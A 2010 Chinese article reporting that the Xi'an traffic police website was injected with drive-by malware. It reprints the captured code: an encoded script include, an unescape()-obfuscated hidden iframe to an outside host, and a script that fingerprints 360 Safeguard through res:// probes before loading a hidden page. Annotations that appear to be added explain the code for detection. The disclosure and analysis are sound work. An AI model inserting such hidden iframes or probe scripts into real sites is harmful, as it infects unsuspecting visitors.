西安市公安局交警支队网站长期被挂马

来源:岁月联盟 编辑:猪猪 时间:2010-04-19

西安市公安局交通警察支队网站长期被挂马

[作者:猪猪]

[信箱:100298@qq.com]

[版权所有:岁月联盟 www.syue.com]

大家都知道,想查看自己的座驾是否违章,可以登录交警的网站查询,虽然网站更新的速度不理想,不过还是有处可查。

可是交警的网站长期被挂木马病毒,你还敢去吗?

黑客是利用 360安全卫士 的漏洞进行挂马,如果安装了360安全卫士的朋友没有及时更新版本,那么就完蛋了。(注:下文贴出的脚本中只能看到对 360 安装文件的 res:// 探测,具体利用的是哪个漏洞、最终加载的页面内容是什么,本文没有给出。)

下面我们来看看西安某交警网站的截图:





挂马代码:

<!-- Injected external script include. The host name is percent-encoded (%76 = v, %61 = a, %72 = r, %74 = t, ...); decoded it reads c.vcmart.com.cn, as listed further down the page. When searching page sources or proxy logs, match both the encoded and the decoded form. -->
<script src=http://c.%76cm%61%72%74.%63%6F%6D.%63n></script>

挂马代码(另一段):

// Injected snippet, kept exactly as captured.
// When the page URL contains the substring "gov" the first branch is empty and
// nothing is written; on every other URL the else-branch writes a
// display:none <div> that wraps an iframe.
if(document.location.href.indexOf("gov")>=0)
{} else {document.write("<div style='display:none'>")
// The iframe markup is stored percent-encoded and only becomes "<iframe ...>"
// at run time through unescape(), so a search for a literal "<iframe" in the
// page source will not find it. Decode before matching, or match on the
// unescape('%3Ciframe pattern itself.
document.write(unescape('%3Ciframe%20src%3Dhttp%3A//%74%62%61%6F%37%2E%36%36%30%30%2E%6F%72%67:%39%37/%78%6F/%64%6B.html%20width=100%20height=0%3E%3C/iframe%3E'))
document.write("</div>")}

挂马地址(上面 unescape() 中的字符串解码后的结果):

<!-- Decoded form of the unescape() payload shown above: height=0 keeps the frame from being drawn, and the host is addressed on the non-default port 97. -->
<iframe src=http://tbao7.6600.org:97/xo/dk.html width=100 height=0></iframe>

挂马地址转换后(第一段 <script src> 中经百分号编码的主机名解码后的结果):

http://c.vcmart.com.cn

木马分析代码:

<!-- Third-party script include from js.tongji.linezing.com (id 1566155 in the path) with a <noscript> image fallback. Presumably a visit counter for the page that carries this code; if so, the id is worth recording as an indicator (to be confirmed). -->
<script type="text/javascript" src="http://js.tongji.linezing.com/1566155/tongji.js"></script><noscript><a href=" http://www.linezing.com"><img src="http://img.tongji.linezing.com/1566155/tongji.gif"/></a></noscript>
<script>
/**
 * Writes one cookie through window.document.cookie.
 *
 * The value is passed through escape(); an "expires" attribute is appended
 * only when `expire` is not null/undefined. No path or domain attribute is set.
 *
 * @param name   cookie name, used as given
 * @param value  cookie value, escape()d before it is written
 * @param expire object providing toGMTString() (a Date), or null/undefined for
 *               a cookie without an explicit expiry
 */
function setCookie(name, value, expire) {   
  window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));
}

/**
 * Reads a cookie value from window.document.cookie.
 *
 * Finds the first occurrence of `Name + "="` in the cookie string and returns
 * the unescape()d text from there up to the next ";" (or the end of the
 * string when there is none).
 *
 * @param Name cookie name to look up
 * @returns the decoded value, or null when the cookie string is empty or the
 *          name is not found
 *
 * NOTE(review): `offset` and `end` are assigned without a declaration, so they
 * end up as globals of the page. The indexOf() search is not anchored to the
 * start of a cookie name, so a longer name that ends in `Name` matches too.
 */
function getCookie(Name) {   
   var search = Name + "=";
   if (window.document.cookie.length > 0) { // if there are any cookies
     offset = window.document.cookie.indexOf(search);
  if (offset != -1) { // if cookie exists
       offset += search.length;
// set index of beginning of value
    end = window.document.cookie.indexOf(";", offset)    
// set index of end of cookie value
    if (end == -1)
      end = window.document.cookie.length;
    return unescape(window.document.cookie.substring(offset, end));
     }
   }
   return null;
}
/**
 * Sets the "ItDoor" marker cookie to `name`.
 *
 * The expiry is the current time plus 1000 ms, so the marker is only valid for
 * about one second after it is written.
 *
 * @param name value stored in the "ItDoor" cookie
 */
function register(name) {
  var today = new Date();
  var expires = new Date();
  // Date#setTime takes milliseconds: now + 1000 ms.
  expires.setTime(today.getTime() + 1000);
  setCookie("ItDoor", name, expires);
}

/**
 * Main routine of the captured script (kept byte-for-byte as published).
 *
 * Flow visible in this listing:
 *   1. Return at once when the "ItDoor" cookie is present; otherwise set it.
 *   2. When document.cookie does not contain "hello", set "hello=Yes" and
 *      start res:// image probes for four 360 product file paths.
 *   3. When no probe id is left in knownImg.ok_resList, write a zero-height
 *      iframe pointing at the relative page 0.htm.
 *
 * NOTE(review): both marker cookies expire 1000 ms after being set, so they
 * only suppress a repeat run within roughly one second.
 * NOTE(review): the content of 0.htm is not part of the page, so what is
 * delivered after step 3 cannot be determined from this listing.
 */
function openWin() {

  // Run-once guard: an existing "ItDoor" cookie ends the function.
  var c = getCookie("ItDoor");
  if (c != null) {
    return;
  }
  register("xiaolin");
  
  
 // Second guard: a plain substring search for "hello" anywhere in the cookie string.
 if(document.cookie.indexOf('hello')==-1)
 { 
        var expires=new Date();expires.setTime(expires.getTime()+1000);document.cookie='hello=Yes;path=/;expires='+expires.toGMTString();
  // knownImg is assigned without a declaration and therefore becomes a global.
  knownImg = {}
  // Probe targets: res:// URLs naming resources inside DLLs under a
  // "Program Files" 360 directory on drive c: and d:. res:// is Internet
  // Explorer's scheme for resources embedded in a local file.
  // NOTE(review): the paths show no separators between directory names;
  // presumably the backslashes were lost when the page was published, so these
  // strings should not be used verbatim as detection signatures.
  knownImg.resList = [
  {id: 'safe', res: 'res://c: Program%20Files360360Saferepairleakdll.dll/GIF/154'},
  {id: 'asafe', res: 'res://d: Program%20Files360360Saferepairleakdll.dll/GIF/154'},
  {id: 'bsafe', res: 'res://c: Program%20Files360Safelive.dll/#2/#203'},
  {id: 'csafe', res: 'res://d: Program%20Files360Safelive.dll/#2/#203'}
  ];

  knownImg.ok_resList = new Array();
  // tmp_resList is created here but not used anywhere else in the listing.
  knownImg.tmp_resList = new Array();

  // Starts one Image load per probe target. Only runs where document.all is
  // truthy; elsewhere ok_resList stays empty.
  knownImg.checkSoft = function(){
   if (document.all){
    // x and i are undeclared as well and leak into the global scope.
    x = new Array();
    for (i = 0; i < knownImg.resList.length; i++){
     x[i] = new Image();
     x[i].src = "";
     // Each id is recorded up front and taken back out by the error handler.
     knownImg.ok_resList.push(knownImg.resList[i].id);

     x[i].onload = function(){
     //alert(knownImg.resList[i].id + ': return true');
     }

     x[i].onerror = function(){
     //alert(knownImg.resList[i].id + ': return false');
     // pop() drops the last entry, not the id of the probe that failed, so
     // only the length of ok_resList is meaningful, not its contents.
     knownImg.ok_resList.pop();
     }

     x[i].src = knownImg.resList[i].res;
    }
   }
  }
  knownImg.checkSoft();


  // NOTE(review): this check runs synchronously right after the loads were
  // started; whether the onerror handlers have already fired at this point is
  // not visible from the listing and would need confirming in a sandbox.
  if(knownImg.ok_resList.length>0){
  // At least one probe id is still counted as present: nothing is written.
  // The two lines below are disabled debug output; the Chinese string means "you".
  //alert(knownImg.ok_resList);
  //document.write('你:<br />'+knownImg.ok_resList.join('<br />'));
  }else{
   // Disabled debug output; the Chinese string means "none".
   //alert('没');

  


   // No probe id left: write an iframe with height=0 whose src is the relative
   // URL 0.htm, which resolves against the page hosting this script. The
   // string has no %-escapes, so unescape() returns it unchanged.
   var NewWords;
   NewWords = unescape("<iframe src=0.htm width=100 height=0></iframe>");
   document.write(NewWords);
   
  }
 }

  
}
// Called as soon as the script block is evaluated; no user interaction is involved.
openWin();
</script>